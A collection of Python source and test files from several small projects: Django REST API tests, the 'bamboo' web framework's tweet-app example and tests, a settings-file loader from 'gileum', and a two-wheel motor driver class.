"""Test uploading an image."""
url = upload_image_url(self.recipe.id)
with NamedTemporaryFile(suffix='.jpg') as tf:
img = Image.new('RGB', (10, 10))
img.save(tf, format='JPEG')
tf.seek(0)
res = self.client.post(url, {'image': tf}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.recipe.refresh_from_db()
self.assertIn('image', res.data)
self.assertTrue(path.exists(self.recipe.image.path))
def test_upload_image_invalid(self):
"""Test uploading invalid image."""
url = upload_image_url(self.recipe.id)
res = self.client.post(url, {'image': 'not image'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
```
#### File: user/tests/test_user_api.py
```python
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.shortcuts import reverse
from rest_framework.test import APIClient
from rest_framework import status
def create_user(**param):
"""Create user."""
return get_user_model().objects.create_user(**param)
class PublicUserAPITests(TestCase):
"""Non-authenticated users."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.client = APIClient()
def test_create_valid_user_success(self):
"""Test creating valid user."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
"""Test when he already exists."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Password should be more than 5 chars."""
payload = {
'email': '<EMAIL>',
'password': '12',
'name': 'Guy',
}
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
is_user = get_user_model().objects.filter(
email=payload['email'],
).exists()
self.assertFalse(is_user)
def test_create_token_for_user(self):
"""Test token creation for users."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
res = self.client.post(reverse('user:token'), payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""Test with invalid credentials."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""Test without user."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
"""Test email and password are required."""
payload = {
'email': 'admin',
'password': '',
'name': 'Guy',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
"""Test unauthorized user."""
res = self.client.get(reverse('user:me'))
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateAPITests(TestCase):
"""Test API requests that require authentication."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='Maxim',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_profile_success(self):
"""Test get profile for logged in user."""
res = self.client.get(reverse('user:me'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
res.data,
{'name': self.user.name, 'email': self.user.email},
)
def test_post_profile_not_allowed(self):
"""Test POST is not allowed for profile."""
res = self.client.post(reverse('user:me'), {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating authenticated user."""
payload = {
'name': '<NAME>',
'password': '<PASSWORD>',
}
res = self.client.patch(reverse('user:me'), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
``` |
{
"source": "jjj999/bamboo",
"score": 2
} |
#### File: examples/tweets/app.py
```python
from dataclasses import dataclass
from datetime import datetime
import functools
import json
import traceback
import typing as t
from bamboo import (
ErrInfo,
HTTPStatus,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.api import JsonApiData
from bamboo.request import Response, http
from bamboo.sticky.http import data_format
from peewee import (
BigAutoField,
CharField,
DateTimeField,
ForeignKeyField,
IntegrityError,
Model,
PostgresqlDatabase,
TextField,
)
# For the MVC architecture ------------------------------------------------------
db = PostgresqlDatabase("bamboo-tutorials")
class ModelBase(Model):
class Meta:
database = db
@classmethod
def get_fields(cls) -> t.Tuple[str]:
return tuple(cls._meta.fields.keys())
class ControllerBase:
def __init__(self, model: t.Type[ModelBase]) -> None:
self.model = model
if not model.table_exists():
model.create_table()
# --------------------------------------------------------------------------------
# Errors ----------------------------------------------------------------------
class CustomErrInfo(ErrInfo):
msg: str
def get_body(self) -> t.Union[bytes, t.Iterable[bytes]]:
return self.msg.encode()
class InternalErrInfo(ErrInfo):
http_status = HTTPStatus.INTERNAL_SERVER_ERROR
msg = "Some errors occured in the server."
def __init__(self, *args: object) -> None:
super().__init__(*args)
traceback.print_exc()
# User
class UserAlreadyExistErrInfo(ErrInfo):
http_status = HTTPStatus.BAD_REQUEST
msg = "User already exists."
class UserNotExistErrInfo(ErrInfo):
http_status = HTTPStatus.BAD_REQUEST
msg = "User not found."
# Tweet
class TweetNotExistErrInfo(ErrInfo):
http_status = HTTPStatus.BAD_REQUEST
msg = "Tweets not found."
class TweetForbiddenErrInfo(ErrInfo):
http_status = HTTPStatus.FORBIDDEN
msg = "Deleting tweet was forbidden. Delete your own tweets."
# ----------------------------------------------------------------------------
# APIs ----------------------------------------------------------------------
class UserRegisterInput(JsonApiData):
email: str
name: str
class UserDeleteInput(JsonApiData):
email: str
class TweetsGetInput(JsonApiData):
email: t.Optional[str] = None
class SingleTweet(JsonApiData):
id: int
content: str
datetime: str
class TweetsGetOutput(JsonApiData):
tweets: t.List[SingleTweet]
class TweetPostInput(JsonApiData):
email: str
content: str
class TweetPostOutput(JsonApiData):
id: int
class TweetUpdateInput(JsonApiData):
id: int
new_content: str
class TweetDeleteInput(JsonApiData):
id: int
email: str
# --------------------------------------------------------------------------------
# User Model ------------------------------------------------------------------
class UserModel(ModelBase):
email = CharField(primary_key=True)
name = CharField()
class UserController(ControllerBase):
LEN_SERIAL_STRING = 16
def __init__(self, model: t.Type[UserModel]) -> None:
super().__init__(model)
self.model = model
def register(self, name: str, email: str) -> None:
try:
data = {"name": name, "email": email}
self.model.create(**data)
except IntegrityError as e:
raise UserAlreadyExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
def delete(self, email: str) -> None:
try:
model = self.model.get_by_id(email)
model.delete_instance()
except self.model.DoesNotExist as e:
raise UserNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
# --------------------------------------------------------------------------------
# Tweet Model ------------------------------------------------------------------
class TweetModel(ModelBase):
id = BigAutoField(primary_key=True)
user = ForeignKeyField(UserModel, backref="tweets")
content = TextField()
datetime = DateTimeField(default=datetime.now)
@dataclass
class Tweet:
id: int
content: str
datetime: str
class TweetController(ControllerBase):
def __init__(self, model: TweetModel) -> None:
super().__init__(model)
self.model = model
def post(self, email: str, content: str) -> int:
data = {"user": email, "content": content}
try:
model = self.model.create(**data)
except IntegrityError as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
else:
return model.id
def update(self, id: int, new_content: str) -> None:
try:
model = self.model.get_by_id(id)
model.content = new_content
model.save()
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
def delete(self, id: int, email: str) -> None:
try:
model = self.model.get_by_id(id)
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo from e
except Exception as e:
raise InternalErrInfo() from e
else:
if email != model.user.email:
raise TweetForbiddenErrInfo()
model.delete_instance()
def get_tweets(
self,
email: t.Optional[str] = None,
) -> t.List[SingleTweet]:
try:
if email is None:
query = self.model.select()
else:
query = self.model.select().where(self.model.user == email)
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
else:
tweets = [
SingleTweet(
id=m.id,
content=m.content,
datetime=m.datetime.ctime(),
)
for m in query
]
return tweets
# --------------------------------------------------------------------------------
# Endpoitns ----------------------------------------------------------------------
app = WSGIApp()
Callback_t = t.Callable[[WSGIEndpoint], None]
def print_request_body(callback: Callback_t) -> Callback_t:
@functools.wraps(callback)
def printer(self: WSGIEndpoint) -> None:
if len(self.body):
data = json.loads(self.body)
print("Requested")
print("---------")
print(json.dumps(data, indent=4))
callback(self)
return printer
@app.route("user")
class UserEndpoint(WSGIEndpoint):
def setup(self, controller: UserController) -> None:
self.controller = controller
@print_request_body
@data_format(input=UserRegisterInput, output=None)
def do_POST(self, req: UserRegisterInput) -> None:
self.controller.register(req.name, req.email)
self.send_only_status(HTTPStatus.OK)
@print_request_body
@data_format(input=UserDeleteInput, output=None)
def do_DELETE(self, req: UserDeleteInput) -> None:
self.controller.delete(req.email)
self.send_only_status(HTTPStatus.OK)
@app.route("tweet")
class TweetsEndpoint(WSGIEndpoint):
def setup(self, controller: TweetController) -> None:
self.controller = controller
@print_request_body
@data_format(input=TweetsGetInput, output=TweetsGetOutput)
def do_GET(self, req: TweetsGetInput) -> None:
tweets = self.controller.get_tweets(req.email)
self.send_json(TweetsGetOutput(tweets=tweets))
@print_request_body
@data_format(input=TweetPostInput, output=TweetPostOutput)
def do_POST(self, req: TweetPostInput) -> None:
id = self.controller.post(req.email, req.content)
self.send_json(TweetPostOutput(id=id))
@print_request_body
@data_format(input=TweetUpdateInput, output=None)
def do_PUT(self, req: TweetUpdateInput) -> None:
self.controller.update(req.id, req.new_content)
self.send_only_status(HTTPStatus.OK)
@print_request_body
@data_format(input=TweetDeleteInput, output=None)
def do_DELETE(self, req: TweetDeleteInput) -> None:
self.controller.delete(req.id, req.email)
self.send_only_status(HTTPStatus.OK)
# --------------------------------------------------------------------------------
# Client App ------------------------------------------------------------------
@dataclass
class Uris:
user: str
tweet: str
def confirm_yes_no(msg: str) -> bool:
is_yes = True
while True:
answer = input(msg + " [yes/no] : ")
if answer == "yes":
break
elif answer == "no":
is_yes = False
break
else:
print("yes か no で答えてください.")
return is_yes
def request_user_register(uris: Uris) -> str:
print("ユーザー登録をします.")
email = input("メールアドレスを入力してください : ")
name = input("お好きなユーザー名を登録してください : ")
with http.post(
uris.user,
json=UserRegisterInput(email=email, name=name),
) as res:
if res.ok:
print("ユーザー登録が完了しました.\n")
return email
else:
print(res.body.decode(), end="\n\n")
def request_user_delete(uris: Uris, email: str) -> None:
if not confirm_yes_no("本当に削除しますか?"):
print("削除を中止します.\n")
return
with http.delete(uris.user, json=UserDeleteInput(email=email)) as res:
if res.ok:
print("削除が完了しました.\n")
else:
print(res.body.decode(), end="\n\n")
def print_tweets(tweets: t.List[SingleTweet]) -> None:
for tweet in tweets:
print("-" * 30)
print()
print(f"ID: {tweet.id}")
print(f"Datetime: {tweet.datetime}")
print(f"Content: {tweet.content}")
print()
def request_tweets_all(uris: Uris, email: str) -> None:
with http.get(
uris.tweet,
json=TweetsGetInput(email=None),
datacls=TweetsGetOutput,
) as res:
if res.ok:
data = res.attach()
print_tweets(data.tweets)
else:
print(res.body.decode(), end="\n\n")
def request_tweets_history(uris: Uris, email: str) -> None:
with http.get(
uris.tweet,
json=TweetsGetInput(email=email),
datacls=TweetsGetOutput,
) as res:
if res.ok:
data = res.attach()
print_tweets(data.tweets)
else:
print(res.body.decode(), end="\n\n")
def request_tweet_post(uris: Uris, email: str) -> None:
content = input("ツイート内容 >> ")
with http.post(
uris.tweet,
json=TweetPostInput(email=email, content=content),
datacls=TweetPostOutput,
) as res:
if res.ok:
data = res.attach()
print(f"投稿が完了しました.ID: {data.id}\n")
else:
print(res.body.decode(), end="\n\n")
def request_tweet_update(uris: Uris, email: str) -> None:
id = int(input("編集したいツイートID: "))
content = input("新しいツイート内容 >> ")
with http.put(
uris.tweet,
json=TweetUpdateInput(id=id, new_content=content),
) as res:
if res.ok:
print(f"投稿が完了しました.\n")
else:
print(res.body.decode(), end="\n\n")
def request_tweet_delete(uris: Uris, email: str) -> None:
id = int(input("削除したいツイートID: "))
with http.delete(
uris.tweet,
json=TweetDeleteInput(id=id, email=email),
) as res:
if res.ok:
print("削除が完了しました.\n")
elif res.status == HTTPStatus.FORBIDDEN:
print("あなたのツイートではありません.\n")
else:
print(res.body.decode(), end="\n\n")
COMMANDS = (
(1, "exit", "ユーザーを削除します", request_user_delete),
(2, "all", "全てのツイートを表示します", request_tweets_all),
(3, "history", "ツイート履歴を表示します", request_tweets_history),
(4, "post", "新規ツイートをします", request_tweet_post),
(5, "update", "ツイート内容を編集します", request_tweet_update),
(6, "delete", "ツイートを削除します", request_tweet_delete),
)
def display_commands():
print("-" * 60)
for no, command, explain, _ in COMMANDS:
print(f"{no:>4} : {command:^10} : {explain:<30}")
print("-" * 60)
def request_interact(uris: Uris):
    is_registered = confirm_yes_no("Have you already registered as a user?")
if is_registered:
email = input("メールアドレスを入力してください: ")
else:
email = request_user_register(uris)
display_commands()
print("上のコマンド一覧から実行したいコマンドを選んでください.No でも コマンド名でも構いません."
"終了したい場合は 'q',コマンド一覧を表示したい場合は 'd' を入力してください.\n")
while True:
request = input("No または コマンド名 >> ")
if request == "q":
break
if request == "d":
display_commands()
continue
if request.isdigit():
request = int(request)
print()
for no, command, _, func in COMMANDS:
if request in (no, command):
func(uris, email)
break
else:
print("一致するコマンドが存在しません.\n")
# --------------------------------------------------------------------------------
if __name__ == "__main__":
import sys
uris = Uris(
"http://localhost:8000/user",
"http://localhost:8000/tweet",
)
user_controller = UserController(UserModel)
tweet_controller = TweetController(TweetModel)
app.set_parcel(UserEndpoint, user_controller)
app.set_parcel(TweetsEndpoint, tweet_controller)
if len(sys.argv) == 1:
form = WSGIServerForm("", 8000, app, "app.log")
executor = WSGITestExecutor(form)
executor.exec(request_interact, args=(uris,))
elif sys.argv[1] == "client":
request_interact(uris)
```
#### File: examples/upsidedown/serve.py
```python
from bamboo import (
JsonApiData,
WSGIApp,
WSGIEndpoint,
WSGITestExecutor,
)
from bamboo.sticky.http import data_format
app = WSGIApp()
class UpsideDownRequest(JsonApiData):
token: str
class UpsideDownResponse(JsonApiData):
result: str
@app.route("upsidedown")
class UpsideDownEndpoint(WSGIEndpoint):
@data_format(input=UpsideDownRequest, output=UpsideDownResponse)
def do_GET(self, req_body: UpsideDownRequest) -> None:
result = req_body.token[::-1]
self.send_json(UpsideDownResponse(result=result))
if __name__ == "__main__":
WSGITestExecutor.debug(app)
```
#### File: bamboo/js_tests/run_tests.py
```python
import http.server
import multiprocessing as mp
from pathlib import Path
import socket
import socketserver
import time
import typing as t
import webbrowser
from bamboo import WSGITestExecutor
from .app import js_tests_app
HOST_WEB = "localhost"
PORT_WEB = 8000
HOST_APP = "localhost"
PORT_APP = 9000
DIR_WEB = str((Path(__file__).parent / "web").absolute())
class WebHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def setup(self) -> None:
super().setup()
self.directory = DIR_WEB
class WebServer(socketserver.TCPServer):
def __init__(
self,
server_address: t.Tuple[str, int],
RequestHandlerClass: t.Callable[..., socketserver.BaseRequestHandler],
bind_and_activate: bool = True,
) -> None:
socketserver.BaseServer.__init__(
self,
server_address,
RequestHandlerClass,
)
self.socket = socket.socket(
self.address_family,
self.socket_type,
)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if bind_and_activate:
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
def run_app_server() -> None:
WSGITestExecutor.debug(js_tests_app, HOST_APP, PORT_APP)
def run_web_server() -> None:
with WebServer(
(HOST_WEB, PORT_WEB),
WebHTTPRequestHandler,
) as server:
server.serve_forever()
def run_servers() -> t.Tuple[mp.Process, mp.Process]:
ps_app = mp.Process(target=run_app_server)
ps_app.start()
ps_web = mp.Process(target=run_web_server)
ps_web.start()
time.sleep(0.05)
return (ps_app, ps_web)
def main() -> None:
ps_app, ps_web = run_servers()
webbrowser.open_new(f"http://{HOST_WEB}:{PORT_WEB}")
try:
while True:
time.sleep(10000)
except KeyboardInterrupt:
print()
finally:
ps_app.terminate()
ps_web.terminate()
ps_app.join()
ps_web.join()
ps_app.close()
ps_web.close()
if __name__ == "__main__":
main()
```
#### File: bamboo/scripts/init_dev_env.py
```python
import subprocess
def init_dev_env() -> None:
cmds = [
["pipenv", "install"],
["pipenv", "install", "--dev"],
["git", "config", "commit.message", ".gitmessage"],
]
for cmd in cmds:
subprocess.run(cmd)
if __name__ == "__main__":
init_dev_env()
```
#### File: tests/tests_app/test_version.py
```python
import unittest
from bamboo import (
WSGIApp,
WSGIEndpoint,
VersionConfig,
)
app = WSGIApp()
@app.route("test", "hoge", version=1)
class TestEndpointSingle(WSGIEndpoint):
ideal_uris = [
("v1", "test", "hoge"),
]
@app.route("test", "hogehoge", version=(1, 2, 3))
class TestEndpointMultiple(WSGIEndpoint):
ideal_uris = [
("v1", "test", "hogehoge"),
("v2", "test", "hogehoge"),
("v3", "test", "hogehoge"),
]
@app.route("test", "hogest", version=None)
class TestEndpointAny(WSGIEndpoint):
ideal_uris = [
("test", "hogest")
]
class TestEndpointNothing(WSGIEndpoint):
pass
class TestVersion(unittest.TestCase):
def test_version_single(self):
config = VersionConfig(TestEndpointSingle)
self.assertEqual(config.get(app), (1,))
uris = app.search_uris(TestEndpointSingle)
for uri, ideal in zip(uris, TestEndpointSingle.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_multiple(self):
config = VersionConfig(TestEndpointMultiple)
self.assertEqual(config.get(app), (1, 2, 3))
uris = app.search_uris(TestEndpointMultiple)
for uri, ideal in zip(uris, TestEndpointMultiple.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_any(self):
config = VersionConfig(TestEndpointAny)
self.assertEqual(config.get(app), ())
uris = app.search_uris(TestEndpointAny)
for uri, ideal in zip(uris, TestEndpointAny.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_nothing(self):
config = VersionConfig(TestEndpointNothing)
self.assertEqual(config.get(app), None)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/tests_io/test_buffered_binary_iterator.py
```python
from os import getrandom
import unittest
from bamboo import BufferedBinaryIterator
class TestBufferedBinaryIterator(unittest.TestCase):
def setUp(self) -> None:
self.total = 10**5
self.bufsize = 8192
self.data = getrandom(self.total)
self.iter = BufferedBinaryIterator(self.data, self.bufsize)
def test_iter(self):
sum = 0
for i in self.iter:
diff = self.total - sum
if diff < self.bufsize:
self.assertEqual(len(i), diff)
else:
self.assertEqual(len(i), self.bufsize)
sum += len(i)
self.assertEqual(sum, self.total)
if __name__ == "__main__":
unittest.main()
```
#### File: tests_sticky/http/test_sticky_has_header_of.py
```python
import unittest
from bamboo import (
ASGIApp,
ASGIHTTPEndpoint,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.request import http
from bamboo.sticky.http import has_header_of
from bamboo.util.string import rand_string
from ... import get_log_name
from ...asgi_util import ASGIServerForm, ASGITestExecutor
app_asgi = ASGIApp()
app_wsgi = WSGIApp()
PATH_ASGI_SERVER_LOG = get_log_name(__file__, "asgi")
PATH_WSGI_SERVER_LOG = get_log_name(__file__, "wsgi")
RANDOM_HEADERS = [(rand_string(10), rand_string(10)) for _ in range(10)]
@app_asgi.route()
class TestASGIHTTPEndpoint(ASGIHTTPEndpoint):
@has_header_of(RANDOM_HEADERS[0][0])
@has_header_of(RANDOM_HEADERS[1][0])
@has_header_of(RANDOM_HEADERS[2][0])
@has_header_of(RANDOM_HEADERS[3][0])
@has_header_of(RANDOM_HEADERS[4][0])
@has_header_of(RANDOM_HEADERS[5][0])
@has_header_of(RANDOM_HEADERS[6][0])
@has_header_of(RANDOM_HEADERS[7][0])
@has_header_of(RANDOM_HEADERS[8][0])
@has_header_of(RANDOM_HEADERS[9][0])
async def do_GET(
self,
header0: str,
header1: str,
header2: str,
header3: str,
header4: str,
header5: str,
header6: str,
header7: str,
header8: str,
header9: str,
) -> None:
self.send_only_status()
@app_wsgi.route()
class TestWSGIEndpoint(WSGIEndpoint):
@has_header_of(RANDOM_HEADERS[0][0])
@has_header_of(RANDOM_HEADERS[1][0])
@has_header_of(RANDOM_HEADERS[2][0])
@has_header_of(RANDOM_HEADERS[3][0])
@has_header_of(RANDOM_HEADERS[4][0])
@has_header_of(RANDOM_HEADERS[5][0])
@has_header_of(RANDOM_HEADERS[6][0])
@has_header_of(RANDOM_HEADERS[7][0])
@has_header_of(RANDOM_HEADERS[8][0])
@has_header_of(RANDOM_HEADERS[9][0])
def do_GET(
self,
header0: str,
header1: str,
header2: str,
header3: str,
header4: str,
header5: str,
header6: str,
header7: str,
header8: str,
header9: str,
) -> None:
self.send_only_status()
class TestStickyHasHeaderOf(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
form_asgi = ASGIServerForm("", 8000, app_asgi, PATH_ASGI_SERVER_LOG)
form_wsgi = WSGIServerForm("", 8001, app_wsgi, PATH_WSGI_SERVER_LOG)
cls.executor_asgi = ASGITestExecutor(form_asgi).start_serve()
cls.executor_wsgi = WSGITestExecutor(form_wsgi).start_serve()
cls.uri_asgi = "http://localhost:8000"
cls.uri_wsgi = "http://localhost:8001"
@classmethod
def tearDownClass(cls) -> None:
cls.executor_asgi.close()
cls.executor_wsgi.close()
def test_asgi(self):
with http.get(self.uri_asgi, headers=dict(RANDOM_HEADERS)) as res:
self.assertTrue(res.ok)
def test_wsgi(self):
with http.get(self.uri_wsgi, headers=dict(RANDOM_HEADERS)) as res:
self.assertTrue(res.ok)
if __name__ == "__main__":
unittest.main()
```
#### File: tests_sticky/http/test_sticky_may_occur.py
```python
import unittest
from bamboo import (
ASGIHTTPEndpoint,
ErrInfo,
WSGIEndpoint,
)
from bamboo.sticky.http import HTTPErrorConfig, may_occur
ERRORS = [type(f"TestErr{i}", (ErrInfo,), {}) for i in range(10)]
class TestWSGIEndpoint(WSGIEndpoint):
@may_occur(*ERRORS)
def do_GET(self) -> None:
pass
class TestASGIHTTPEndpoint(ASGIHTTPEndpoint):
@may_occur(*ERRORS)
async def do_GET(self) -> None:
pass
class TestStickyMayOccur(unittest.TestCase):
def check_registered(self, callback):
config = HTTPErrorConfig(callback)
errors_registered = config.get()
for err in ERRORS:
self.assertIn(err, errors_registered)
def test_wsgi(self):
self.check_registered(TestWSGIEndpoint.do_GET)
def test_asgi(self):
self.check_registered(TestASGIHTTPEndpoint.do_GET)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/tests_test/test_test_executor.py
```python
import unittest
from bamboo import (
ContentType,
MediaTypes,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.api import JsonApiData
from bamboo.request import http
from bamboo.sticky.http import data_format
from bamboo.util.time import get_datetime_rfc822
from .. import PATH_IMAGE, get_log_name
NAME_SERVER = "Mocker"
PATH_SERVER_LOG_1 = get_log_name(__file__, "1")
PATH_SERVER_LOG_2 = get_log_name(__file__, "2")
PATH_SERVER_LOG_3 = get_log_name(__file__, "3")
class InfoResponse(JsonApiData):
server_name: str
current_time: str
class MockInfoEndpoint(WSGIEndpoint):
@data_format(input=None, output=InfoResponse)
def do_GET(self) -> None:
body = {
"server_name": NAME_SERVER,
"current_time": get_datetime_rfc822()
}
self.send_json(body)
class MockImageEndpoint(WSGIEndpoint):
def do_GET(self) -> None:
with open(PATH_IMAGE, "rb") as f:
image = f.read()
self.send_body(image, content_type=ContentType(MediaTypes.jpeg))
class TestTestExecutor(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.urls_info = [f"http://localhost:800{i}/mock/info" for i in range(3)]
cls.urls_image = [f"http://localhost:800{i}/mock/image" for i in range(3)]
app_1 = WSGIApp()
app_2 = WSGIApp()
app_3 = WSGIApp()
for app in (app_1, app_2, app_3):
app.route("mock", "info")(MockInfoEndpoint)
app.route("mock", "image")(MockImageEndpoint)
form_1 = WSGIServerForm("", 8000, app_1, PATH_SERVER_LOG_1)
form_2 = WSGIServerForm("", 8001, app_2, PATH_SERVER_LOG_2)
form_3 = WSGIServerForm("", 8002, app_3, PATH_SERVER_LOG_3)
cls.executor = WSGITestExecutor(form_1, form_2, form_3).start_serve()
@classmethod
def tearDownClass(cls) -> None:
cls.executor.close()
def test_get_info(self):
for url in self.urls_info:
res = http.get(url, datacls=InfoResponse)
data = res.attach()
self.assertTrue(isinstance(data, InfoResponse))
self.assertEqual(data.server_name, "Mocker")
def test_get_image(self):
with open(PATH_IMAGE, "rb") as f:
image_ideal = f.read()
for url in self.urls_image:
res = http.get(url)
data = res.body
self.assertEqual(image_ideal, data)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jjj999/gileum",
"score": 2
} |
#### File: gileum/gileum/loader.py
```python
from importlib.machinery import ModuleSpec
import importlib.util
import inspect
import os
from pathlib import Path
import sys
import typing as t
from .gileum import BaseGileum
from .manager import _get_glm_manager
def _convert2relative_path(path: str) -> str:
return str(Path(path).relative_to(os.getcwd()))
def _import_directly(file: str) -> ModuleSpec:
if os.path.isabs(file):
file = _convert2relative_path(file)
mod_name = file.replace(os.sep, ".")
spec = importlib.util.spec_from_file_location(mod_name, file)
mod = importlib.util.module_from_spec(spec)
sys.modules[mod_name] = mod
spec.loader.exec_module(mod)
return mod
def _search_glm_from_mod(mod: ModuleSpec) -> t.List[BaseGileum]:
f_predicate = lambda obj: isinstance(obj, BaseGileum)
return [val for _, val in inspect.getmembers(mod, f_predicate)]
def _has_glmfile_name(file: str) -> bool:
base = os.path.basename(file)
return base.startswith("glm_") and base.endswith(".py")
def list_glmfiles(dir: str, join: bool = True) -> t.List[str]:
files = filter(_has_glmfile_name, os.listdir(dir))
if join:
files = map(lambda f: os.path.join(dir, f), files)
return list(files)
def load_glms_at(file: str) -> None:
mod = _import_directly(file)
glms = _search_glm_from_mod(mod)
manager = _get_glm_manager()
for glm in glms:
manager._set_glm(glm)
def load_glms_in(dir: str) -> None:
for gilfile in list_glmfiles(dir):
load_glms_at(gilfile)
```
#### File: gileum/tests/test_loader.py
```python
from os.path import basename, join
import unittest
from gileum.loader import (
list_glmfiles,
load_glms_at,
load_glms_in,
)
from gileum.manager import (
GileumManager,
init_glm_manager,
get_glm,
_reset_glm_manager,
)
from gileum.test import MockGileum
from . import DIR_RES, FILE_SETTING
TEST_NAME = "unittest<EMAIL>"
DEVELOPER_NAME = "jjj999"
GLM_NAME = "main"
class TestLoader(unittest.TestCase):
def setUp(self) -> None:
_reset_glm_manager()
init_glm_manager(GileumManager())
def test_list_glmfiles(self) -> None:
result = list_glmfiles(DIR_RES)
self.assertEqual(len(result), 1)
glm_file = result[0]
self.assertTrue(basename(glm_file), "glm_mock_setting.py")
def assertGileum(self, glm: MockGileum) -> None:
self.assertEqual(glm.test_name, TEST_NAME)
self.assertEqual(glm.developer_name, DEVELOPER_NAME)
self.assertIsInstance(glm.current_time, float)
self.assertEqual(glm.glm_name, GLM_NAME)
def test_load_glms_at(self) -> None:
load_glms_at(join(DIR_RES, FILE_SETTING))
glm = get_glm(MockGileum, GLM_NAME)
self.assertGileum(glm)
def test_load_glms_in(self) -> None:
load_glms_in(DIR_RES)
glm = get_glm(MockGileum, GLM_NAME)
self.assertGileum(glm)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jjj999/pisat",
"score": 3
} |
#### File: pisat/actuator/two_wheels.py
```python
from typing import Optional, Union
from enum import Enum
from pisat.actuator.rotate_motor_driver_base import RotateMotorDriverBase
class TwoWheels(RotateMotorDriverBase):
def __init__(self,
driver_L: RotateMotorDriverBase,
driver_R: RotateMotorDriverBase,
name: Optional[str] = None) -> None:
super().__init__(name=name)
if not isinstance(driver_L, RotateMotorDriverBase):
raise TypeError(
"'driver_L' must be RotateMotorDriverBase."
)
if not isinstance(driver_R, RotateMotorDriverBase):
raise TypeError(
"'driver_R' must be RotateMotorDriverBase."
)
if driver_L.__class__ is not driver_R.__class__:
raise TypeError(
"'driver_L' and 'driver_R' must be objects of same type."
)
self._driver_L: RotateMotorDriverBase = driver_L
self._driver_R: RotateMotorDriverBase = driver_R
self._current_param: Union[int, float] = 0.
def standby(self) -> None:
self._driver_L.standby()
self._driver_R.standby()
def brake(self) -> None:
self._driver_L.brake()
self._driver_R.brake()
self._current_param = 0.
    # TODO Verify the direction conventions on real hardware.
    def straight(self, param: Optional[Union[int, float]] = None) -> None:
        # Fall back to the current parameter when none is given; the original
        # compared None against 0, which raises a TypeError.
        if param is None:
            param = self._current_param
        if param >= 0:
            self._driver_L.cw(param)
            self._driver_R.ccw(param)
        else:
            # Hand the magnitude to the drivers, as cw()/ccw() below do.
            self._driver_L.ccw(abs(param))
            self._driver_R.cw(abs(param))
        self._current_param = param
def cw(self, param: Union[int, float]) -> None:
self.brake()
if param >= 0:
self._driver_L.cw(param)
else:
self._driver_R.cw(abs(param))
def ccw(self, param: Union[int, float]) -> None:
self.brake()
if param >= 0:
self._driver_R.ccw(param)
else:
self._driver_L.ccw(abs(param))
def curve_cw(self,
dec: Union[int, float],
base: Optional[Union[int, float]] = None) -> None:
if base is not None:
self._current_param = base
